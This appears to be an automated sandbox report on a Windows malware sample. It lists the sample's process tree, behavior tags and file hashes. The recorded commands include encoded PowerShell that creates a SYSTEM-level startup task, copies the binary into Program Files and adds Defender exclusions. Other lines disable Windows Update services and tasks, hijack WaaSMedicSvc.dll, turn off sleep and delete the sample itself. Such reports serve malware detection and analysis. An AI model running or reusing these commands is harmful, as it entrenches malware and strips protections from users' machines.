- Suspicious use of AdjustPrivilegeToken
PID:3668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZAB4AHAAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABBAEEAWgBBAEIANgBBAEcATQBBAEkAdwBBACsAQQBDAEEAQQBVAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAMABBAFUAQQBCAHkAQQBHADgAQQBZAHcAQgBsAEEASABNAEEAYwB3AEEAZwBBAEMAMABBAFIAZwBCAHAAQQBHAHcAQQBaAFEAQgBRAEEARwBFAEEAZABBAEIAbwBBAEMAQQBBAEoAdwBCAEQAQQBEAG8AQQBYAEEAQgBRAEEASABJAEEAYgB3AEIAbgBBAEgASQBBAFkAUQBCAHQAQQBDAEEAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAegBBAEYAdwBBAE4AQQBBAHkAQQBEAE0AQQBOAFEAQQAxAEEARABNAEEATQBnAEEAMgBBAEQARQBBAEwAUQBCAE8AQQBEAFUAQQBNAGcAQQAxAEEARABRAEEATQBnAEEAdABBAEQAVQBBAE4AZwBCAEcAQQBFAGMAQQBVAHcAQgBJAEEARgB3AEEAWgB3AEIAegBBAEcAUQBBAE4AUQBBADAAQQBEAE0AQQBNAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYQBRAEIAMQBBAEgAawBBAFoAZwBBAGoAQQBEADQAQQAiACcAKQAgADwAIwBqAHUAdQBlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAeQBtACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAegB4AHoAeAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcAZwBzAGQANQA0ADMAMgAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAaQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMANwBhAGQAOABhAGYAZgA0AGIAOQBiAGMAYQBhAGYAOAAzADYAMgBiAGMANAA2AGQAYgBiADMAMwA1AGIAZAAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcADQAMgAzADUANQAzADIANgAxAC0ATgA1ADIANQA0ADIALQA1ADYARgBHAFMASABcAGcAcwBkADUANAAzADIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbABpAHEAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGoAawBtACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBnAHMAZAA1ADQAMwAyACcAOwA="2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHAAZAB6AGMAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwANAAyADMANQA1ADMAMgA2ADEALQBOADUAMgA1ADQAMgAtADUANgBGAEcAUwBIAFwAZwBzAGQANQA0ADMAMgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAaQB1AHkAZgAjAD4A"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1296 -
C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4252 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:4248
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1540 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1824 -
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:3420 -
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:2488 -
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:4736 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:3472 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:4980 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:3412 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:3356 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:4268 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:616 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:624 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1972 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:2360
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:2140
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:2908
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:520
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:2624
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:396
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:4876
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:4620 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:3580 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:4500
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:8
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:4680
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:2040
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:2024
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "afakligmufddfq"3⤵PID:3060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe yyyqnbmbehbu1 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3⤵
- Suspicious behavior: EnumeratesProcesses
PID:444
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.0MB
MD5c7ad8aff4b9bcaaf8362bc46dbb335bd
SHA16da9bd46beba784cde7bce3d73963567c9efb9b0
SHA2561c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
SHA512e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
-
Filesize
5.0MB
MD5c7ad8aff4b9bcaaf8362bc46dbb335bd
SHA16da9bd46beba784cde7bce3d73963567c9efb9b0
SHA2561c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
SHA512e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf